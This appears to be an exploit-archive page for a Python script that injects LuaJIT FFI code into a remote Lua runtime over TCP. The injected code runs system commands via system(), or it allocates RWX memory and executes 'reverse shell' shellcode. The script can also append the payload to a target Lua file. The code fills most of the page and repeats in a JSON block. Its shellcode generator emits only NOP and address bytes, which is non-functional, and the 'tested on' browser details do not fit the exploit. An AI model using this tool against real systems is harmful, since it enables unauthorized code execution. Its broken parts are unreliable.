📄 LuaJIT 2.1.1774638290 FFI Remote Code Execution / Lua Injection

Description

This script is a LuaJIT exploitation tool that attempts to abuse the LuaJIT FFI Foreign Function Interface to execute system commands or arbitrary shellcode on a remote Lua runtime exposed over a TCP socket. It connects to a target service, injects Lua...

Visit Original Source

Basic Information

ID PACKETSTORM:219754

Published Apr 24, 2026 at 00:00

Affected Product

Affected Versions ==================================================================================================================================
| # Title : LuaJIT 2.1.1774638290 FFI Remote Code Execution Exploit via Socket-Based Lua Injection |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://luajit.org/download.html |
==================================================================================================================================

[+] Summary : This script is a LuaJIT exploitation tool that attempts to abuse the LuaJIT FFI (Foreign Function Interface) to execute system commands or arbitrary shellcode on a remote Lua runtime exposed over a TCP socket.
It connects to a target service, injects Lua code dynamically, and leverages unsafe FFI bindings such as system() and mmap() to achieve remote code execution (RCE).
In advanced mode, it attempts to allocate executable memory and run shellcode for a reverse shell.

[+] POC :

#!/usr/bin/env python3

import socket
import sys
import re
import time
import struct
from typing import Optional, Tuple

class LuaJITExploit:
def __init__(self, host: str, port: int, target_lua_script_path: Optional[str] = None):
self.host = host
self.port = port
self.target_lua_script_path = target_lua_script_path
self.socket = None

def connect(self) -> bool:
try:
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.connect((self.host, self.port))
print(f"[+] Connected to {self.host}:{self.port}")
return True
except Exception as e:
print(f"[-] Connection failed: {e}")
return False

def send_lua_code(self, lua_code: str) -> Optional[str]:
if not self.socket:
return None

try:
self.socket.send(lua_code.encode() + b'\n')
response = self.socket.recv(4096)
if not response:
return None
return response.decode(errors="ignore")
except Exception as e:
print(f"[-] Failed to send Lua code: {e}")
return None

def generate_lua_payload(self, command: str = "id", execute_shellcode: bool = False) -> str:
lua_code = f'''
-- LuaJIT FFI Exploit Payload
local ffi = require("ffi")

ffi.cdef[[
int getpid(void);
long syscall(long number, ...);
int system(const char *command);
void *mmap(void *addr, size_t length, int prot, int flags, int fd, long offset);
int mprotect(void *addr, size_t len, int prot);
void *memcpy(void *dest, const void *src, size_t n);
]]

print("[*] Testing FFI access...")
local pid = ffi.C.getpid()
print("[+] getpid() success: " .. pid)

print("[*] Executing command: {command}")
ffi.C.system("{command}")
'''

if execute_shellcode:
reverse_shellcode = self.generate_reverse_shellcode()

lua_code += f'''
print("[*] Attempting shellcode execution...")

local PROT_READ = 0x1
local PROT_WRITE = 0x2
local PROT_EXEC = 0x4
local PROT_RWX = bit.bor(PROT_READ, PROT_WRITE, PROT_EXEC)

local MAP_ANONYMOUS = 0x20
local MAP_PRIVATE = 0x02

local mem = ffi.C.mmap(nil, 4096, PROT_RWX, MAP_ANONYMOUS + MAP_PRIVATE, -1, 0)

if mem ~= nil and tonumber(ffi.cast("intptr_t", mem)) > 0 then
print("[+] RWX memory allocated")

local shellcode = "{reverse_shellcode}"

ffi.C.memcpy(mem, shellcode, #shellcode)

local fn = ffi.cast("void(*)(void)", mem)
fn()
else
print("[-] mmap failed")
end
'''
return lua_code

def generate_reverse_shellcode(self, ip: str = "127.0.0.1", port: int = 4444) -> str:
ip_parts = ip.split(".")
ip_hex = "".join([f"\\x{int(x):02x}" for x in ip_parts])
port_hex = f"\\x{port & 0xff:02x}\\x{(port >> 8) & 0xff:02x}"

shellcode = f"\\x90\\x90\\x90" + ip_hex + port_hex
return shellcode

def exploit_ffi_system(self, command: str = "id") -> bool:
print(f"[*] Exploiting FFI to execute: {command}")

lua_payload = self.generate_lua_payload(command, False)

if self.target_lua_script_path:
try:
with open(self.target_lua_script_path, 'a') as f:
f.write("\n" + lua_payload)
print("[+] Payload injected successfully")
return True
except Exception as e:
print(f"[-] Failed to inject payload: {e}")
return False
else:
if self.connect():
response = self.send_lua_code(lua_payload)
if response is not None:
print(f"[+] Response:\n{response}")
return True
return False
return False

def exploit_shellcode(self, ip: str = "127.0.0.1", port: int = 4444) -> bool:
print(f"[*] Attempting reverse shell to {ip}:{port}")

lua_payload = self.generate_lua_payload("", True)

if self.target_lua_script_path:
try:
with open(self.target_lua_script_path, 'a') as f:
f.write("\n" + lua_payload)
print("[+] Reverse shell payload injected")
return True
except Exception as e:
print(f"[-] Failed to inject payload: {e}")
return False
else:
if self.connect():
response = self.send_lua_code(lua_payload)
if response is not None:
print("[+] Payload sent")
return True
return False
return False

def cleanup(self):
if self.socket:
self.socket.close()
print("[*] Connection closed")

def main():
if len(sys.argv) < 4:
print("Usage: python3 luajit_exploit.py <host> <port> <command>")
sys.exit(1)

host = sys.argv[1]
port = int(sys.argv[2])
command = sys.argv[3]

reverse_shell = "--reverse-shell" in sys.argv

exploit = LuaJITExploit(host, port)

print("=" * 60)
print("LuaJIT Exploit")
print("=" * 60)

if reverse_shell:
exploit.exploit_shellcode()
else:
exploit.exploit_ffi_system(command)

exploit.cleanup()

if __name__ == "__main__":
main()

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================

{
    "lastseen": "2026-04-24T20:46:54",
    "description": "This script is a LuaJIT exploitation tool that attempts to abuse the LuaJIT FFI Foreign Function Interface to execute system commands or arbitrary shellcode on a remote Lua runtime exposed over a TCP socket. It connects to a target service, injects Lua...",
    "published": "2026-04-24T00:00:00",
    "modified": "2026-04-24T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 LuaJIT 2.1.1774638290 FFI Remote Code Execution / Lua Injection",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:219754",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "==================================================================================================================================\n    | # Title     : LuaJIT 2.1.1774638290 FFI Remote Code Execution Exploit via Socket-Based Lua Injection                           |\n    | # Author    : indoushka                                                                                                        |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |\n    | # Vendor    : https://luajit.org/download.html                                                                                 |\n    ==================================================================================================================================\n    \n    [+] Summary    : This script is a LuaJIT exploitation tool that attempts to abuse the LuaJIT FFI (Foreign Function Interface) to execute system commands or arbitrary shellcode on a remote Lua runtime exposed over a TCP socket. \n                     It connects to a target service, injects Lua code dynamically, and leverages unsafe FFI bindings such as system() and mmap() to achieve remote code execution (RCE). \n                     In advanced mode, it attempts to allocate executable memory and run shellcode for a reverse shell.\n    \n    [+] POC        :  \n    \n    #!/usr/bin/env python3\n    \n    import socket\n    import sys\n    import re\n    import time\n    import struct\n    from typing import Optional, Tuple\n    \n    class LuaJITExploit:\n        def __init__(self, host: str, port: int, target_lua_script_path: Optional[str] = None):\n            self.host = host\n            self.port = port\n            self.target_lua_script_path = target_lua_script_path\n            self.socket = None\n            \n        def connect(self) -> bool:\n            try:\n                self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n                self.socket.connect((self.host, self.port))\n                print(f\"[+] Connected to {self.host}:{self.port}\")\n                return True\n            except Exception as e:\n                print(f\"[-] Connection failed: {e}\")\n                return False\n        \n        def send_lua_code(self, lua_code: str) -> Optional[str]:\n            if not self.socket:\n                return None\n                \n            try:\n                self.socket.send(lua_code.encode() + b'\\n')\n                response = self.socket.recv(4096)\n                if not response:\n                    return None\n                return response.decode(errors=\"ignore\")\n            except Exception as e:\n                print(f\"[-] Failed to send Lua code: {e}\")\n                return None\n        \n        def generate_lua_payload(self, command: str = \"id\", execute_shellcode: bool = False) -> str:\n            lua_code = f'''\n    -- LuaJIT FFI Exploit Payload\n    local ffi = require(\"ffi\")\n    \n    ffi.cdef[[\n        int getpid(void);\n        long syscall(long number, ...);\n        int system(const char *command);\n        void *mmap(void *addr, size_t length, int prot, int flags, int fd, long offset);\n        int mprotect(void *addr, size_t len, int prot);\n        void *memcpy(void *dest, const void *src, size_t n);\n    ]]\n    \n    print(\"[*] Testing FFI access...\")\n    local pid = ffi.C.getpid()\n    print(\"[+] getpid() success: \" .. pid)\n    \n    print(\"[*] Executing command: {command}\")\n    ffi.C.system(\"{command}\")\n    '''\n    \n            if execute_shellcode:\n                reverse_shellcode = self.generate_reverse_shellcode()\n                \n                lua_code += f'''\n    print(\"[*] Attempting shellcode execution...\")\n    \n    local PROT_READ = 0x1\n    local PROT_WRITE = 0x2\n    local PROT_EXEC = 0x4\n    local PROT_RWX = bit.bor(PROT_READ, PROT_WRITE, PROT_EXEC)\n    \n    local MAP_ANONYMOUS = 0x20\n    local MAP_PRIVATE = 0x02\n    \n    local mem = ffi.C.mmap(nil, 4096, PROT_RWX, MAP_ANONYMOUS + MAP_PRIVATE, -1, 0)\n    \n    if mem ~= nil and tonumber(ffi.cast(\"intptr_t\", mem)) > 0 then\n        print(\"[+] RWX memory allocated\")\n        \n        local shellcode = \"{reverse_shellcode}\"\n        \n        ffi.C.memcpy(mem, shellcode, #shellcode)\n        \n        local fn = ffi.cast(\"void(*)(void)\", mem)\n        fn()\n    else\n        print(\"[-] mmap failed\")\n    end\n    '''\n            return lua_code\n        \n        def generate_reverse_shellcode(self, ip: str = \"127.0.0.1\", port: int = 4444) -> str:\n            ip_parts = ip.split(\".\")\n            ip_hex = \"\".join([f\"\\\\x{int(x):02x}\" for x in ip_parts])\n            port_hex = f\"\\\\x{port & 0xff:02x}\\\\x{(port >> 8) & 0xff:02x}\"\n            \n            shellcode = f\"\\\\x90\\\\x90\\\\x90\" + ip_hex + port_hex\n            return shellcode\n        \n        def exploit_ffi_system(self, command: str = \"id\") -> bool:\n            print(f\"[*] Exploiting FFI to execute: {command}\")\n            \n            lua_payload = self.generate_lua_payload(command, False)\n            \n            if self.target_lua_script_path:\n                try:\n                    with open(self.target_lua_script_path, 'a') as f:\n                        f.write(\"\\n\" + lua_payload)\n                    print(\"[+] Payload injected successfully\")\n                    return True\n                except Exception as e:\n                    print(f\"[-] Failed to inject payload: {e}\")\n                    return False\n            else:\n                if self.connect():\n                    response = self.send_lua_code(lua_payload)\n                    if response is not None:\n                        print(f\"[+] Response:\\n{response}\")\n                        return True\n                    return False\n                return False\n        \n        def exploit_shellcode(self, ip: str = \"127.0.0.1\", port: int = 4444) -> bool:\n            print(f\"[*] Attempting reverse shell to {ip}:{port}\")\n            \n            lua_payload = self.generate_lua_payload(\"\", True)\n            \n            if self.target_lua_script_path:\n                try:\n                    with open(self.target_lua_script_path, 'a') as f:\n                        f.write(\"\\n\" + lua_payload)\n                    print(\"[+] Reverse shell payload injected\")\n                    return True\n                except Exception as e:\n                    print(f\"[-] Failed to inject payload: {e}\")\n                    return False\n            else:\n                if self.connect():\n                    response = self.send_lua_code(lua_payload)\n                    if response is not None:\n                        print(\"[+] Payload sent\")\n                        return True\n                    return False\n                return False\n        \n        def cleanup(self):\n            if self.socket:\n                self.socket.close()\n                print(\"[*] Connection closed\")\n    \n    \n    def main():\n        if len(sys.argv) < 4:\n            print(\"Usage: python3 luajit_exploit.py <host> <port> <command>\")\n            sys.exit(1)\n        \n        host = sys.argv[1]\n        port = int(sys.argv[2])\n        command = sys.argv[3]\n        \n        reverse_shell = \"--reverse-shell\" in sys.argv\n        \n        exploit = LuaJITExploit(host, port)\n        \n        print(\"=\" * 60)\n        print(\"LuaJIT Exploit\")\n        print(\"=\" * 60)\n        \n        if reverse_shell:\n            exploit.exploit_shellcode()\n        else:\n            exploit.exploit_ffi_system(command)\n        \n        exploit.cleanup()\n    \n    if __name__ == \"__main__\":\n        main()\n    \t\n    Greetings to :==============================================================================\n    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\n    ============================================================================================",
    "sourceHref": "https://packetstorm.news/download/219754",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/219754/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

📄 LuaJIT 2.1.1774638290 FFI Remote Code Execution / Lua Injection_PACKETSTORM:219754

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply